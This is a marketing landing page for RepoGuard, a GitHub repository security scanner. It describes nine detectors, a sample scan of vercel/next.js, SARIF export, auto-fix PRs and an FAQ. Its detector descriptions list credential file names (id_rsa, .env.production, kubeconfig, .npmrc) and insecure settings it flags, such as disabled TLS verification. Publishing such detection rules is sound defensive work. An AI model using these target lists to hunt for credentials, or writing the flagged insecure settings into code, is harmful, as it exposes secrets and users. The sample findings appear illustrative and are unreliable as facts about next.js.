v0.9 · free during beta · no card required

see what
you committed.

RepoGuard scans any public GitHub repo for exposed secrets, vulnerable dependencies, IaC misconfigs, and the insecure patterns your AI assistant just generated. Nine detectors, one click, results in under sixty seconds.

// no login required · 10 scans/h per IP · 5 scans/h per repo · public repos only

try:vercel/next.js openai/openai-cookbook sindresorhus/awesome

→ or sign in with github for unlimited scans

9detectors

172rules

SARIF 2.1code scanning export

<60sscan time

EUdata region

MITlicense

// example output

what a real scan looks like.

Findings come back grouped by severity, with a file path, line number, and a masked preview. No 800-page PDF. No upsell to enterprise.

repoguard — scan

$ repoguard scan vercel/next.js

┌─ summary ────────────────────────────

│ risk score 92 / 100 excellent

│ files scanned 1,247

│ duration 47s

└──────────────────────────────────────

[CRIT]aws-access-key in commit history (3w ago)src/seed.ts:14

[HIGH]next-public-secret-name CWE-200lib/db.ts:7

[HIGH]cve-2024-21501 lodash@4.17.20package.json

[HIGH]tls-verify-disabled CWE-295lib/http.ts:42

[MED ]gha-pull-request-target-checkout-head.github/workflows/ci.yml:23

// 5 of 12 findings shown · ranked by risk score

// detectors

nine detectors,
run in parallel.

Each scan runs every detector against your repo concurrently. No setup, no config files, no allowlist tuning — just sane defaults that flag what an attacker would actually find.

secret-scanner

60+ high-confidence patterns: AWS, GCP, Anthropic, OpenAI, Stripe, Slack, GitHub PATs, SSH keys, Supabase service-role JWTs.

regex

sensitive-files

Flags filenames that imply secrets regardless of content: .env.production, id_rsa, terraform.tfstate, kubeconfig, .npmrc.

filename only

entropy

Catches custom-format secrets in .env / config files via Shannon entropy on KEY=VALUE pairs. Skips placeholders automatically.

≥ 4.0 bits/char

git-history

Replays the last 30 commits looking for secrets that were deleted but never rotated. Dedups against the current tree.

30 commits

code-sast

AST-based via the TypeScript Compiler API plus targeted regex. 28 AST rules covering most of the OWASP Top 10 — SSRF, SQLi, command injection, reflected XSS, prototype pollution, ReDoS, NoSQL / SSTI injection, XXE, weak crypto, JWT misuse, hardcoded creds — plus AI-typical mistakes (TLS verify off, NEXT_PUBLIC_ secrets, bcrypt rounds < 10). Every rule CWE-tagged.

AST + regex · CWE-tagged

deps

npm package-lock.json against the npm advisories bulk API; PyPI requirements/pyproject/Pipfile against OSV.dev.

npm + OSV.dev

supply-chain

Typosquatting (Damerau-Levenshtein vs popular registries), install-hook abuse in package.json scripts and Python setup.py / pyproject.

npm + PyPI

ci-iac

Dockerfile (root user, :latest tags, ADD-from-URL, secrets in ENV) and GitHub Actions (pull_request_target checkouts, unpinned actions, write-all permissions).

CWE-tagged

posture + iam

Repo posture (A+ to F grade — branch protection, CODEOWNERS, signed commits, Dependabot) plus an IAM-risk lens built by a 10-year IAM/IGA specialist: org MFA enforcement, outside-collaborator permission levels, admin-equivalent privilege paths, stale-owner authorship signals. The slice of enterprise IAM tooling solo devs have never had.

IAM-grade

// more detectors added based on what users actually leak

// beyond detection

detect, then
actually fix it.

A finding you can't act on is just noise. Every scan ships with the rails to move from "here's what's wrong" to "here's the PR that fixes it" — or, when it's a false positive, to make it stop nagging you.

## sarif 2.1 export

Every saved scan is one click from a SARIF 2.1.0 export — drop it into github/codeql-action/upload-sarif and findings show up in your repo's Security → Code scanning tab next to CodeQL and Dependabot. Each rule deep-links back to its docs.

→ setup guide

## auto-fix prs

For findings with a clean fix (dependency bumps, secret extraction to process.env / os.environ), RepoGuard opens a PR against your repo directly. Per-finding opt-in, isolated branch, preview before submit. You review before merging.

→ how it works

## suppressions

False positives happen. Suppress a single finding (by fingerprint), a rule on a path (by glob), or a whole rule for the repo — all from the findings view. User-scoped, synced via Supabase, survives across scans. .repoguardignore in your repo also honored.

// why repoguard

built for the dev who skips snyk.

## fast

## private

We never store your source code. Only metadata, file paths, and masked previews. All in EU region. Open source — audit it.

## yours

No upsell to enterprise. No mandatory SSO. No usage gating during beta. The scan you'd actually run.

// faq

asked & answered.

Do you store my source code?+

No. We fetch files from the GitHub API only during a scan and discard them immediately after. We persist findings (path, line, masked preview) — never the code itself.

What permissions does RepoGuard need?+

Sign-in is via the RepoGuard Security GitHub App and gives us read access to your public repositories. We do not read private code. The optional auto-fix PR feature requires you to install the App on the target repo — that grants Contents: write and Pull requests: write scoped to that single repo, used only to open a PR you then review.

Can I scan private repositories?+

Not yet. Sign-in today gives RepoGuard read access to your public repositories only. Private-repo support is on the roadmap.

How is this different from GitHub secret scanning?+

GitHub's built-in scanning is free but limited to partner secret patterns. RepoGuard adds 60+ curated regex patterns, an entropy fallback for custom formats, SAST rules, IaC checks for Dockerfile and GitHub Actions, supply-chain heuristics (typosquatting, install-hook abuse), a 30-commit history replay, a posture grade, and an IAM-risk lens built by a 10-year IAM specialist. One screen, severity-ranked.

Does it catch insecure code generated by Copilot / Cursor / Claude?+

Partly. The SAST detector flags patterns AI assistants commonly emit: TLS verification disabled (rejectUnauthorized: false / verify=False), session cookies with httpOnly: false, bcrypt rounds below 10, process.env fallbacks to a hardcoded secret-shaped literal, and NEXT_PUBLIC_*SECRET* env reads (which Next.js inlines into the client bundle). New rules added as patterns become visible.

Is RepoGuard free?+

Yes, fully free during the current beta. I'm still figuring out what people value enough to pay for — feedback is very welcome.

Where does my data live?+

All scan metadata is stored in Supabase, EU region. The app runs on Vercel. Both providers are SOC 2 compliant. See /security for details.

What if a finding is a false positive?+

Suppress it. From the findings view you can silence a single finding (by fingerprint), a rule on a path glob, or an entire rule for the repo. Suppressions are user-scoped, persisted in Supabase, and survive across scans — no need to commit a config file. If you prefer to version-control them, a .repoguardignore at the repo root is also honored.

Can I push RepoGuard findings into GitHub Code Scanning?+

Yes. Every saved scan is one click from a SARIF 2.1.0 export — drop it into github/codeql-action/upload-sarif and the findings show up in your repo's Security → Code scanning tab next to CodeQL and Dependabot. Each result deep-links back to the matching rule documentation on RepoGuard. Full setup at /docs/sarif.

see whatyou committed.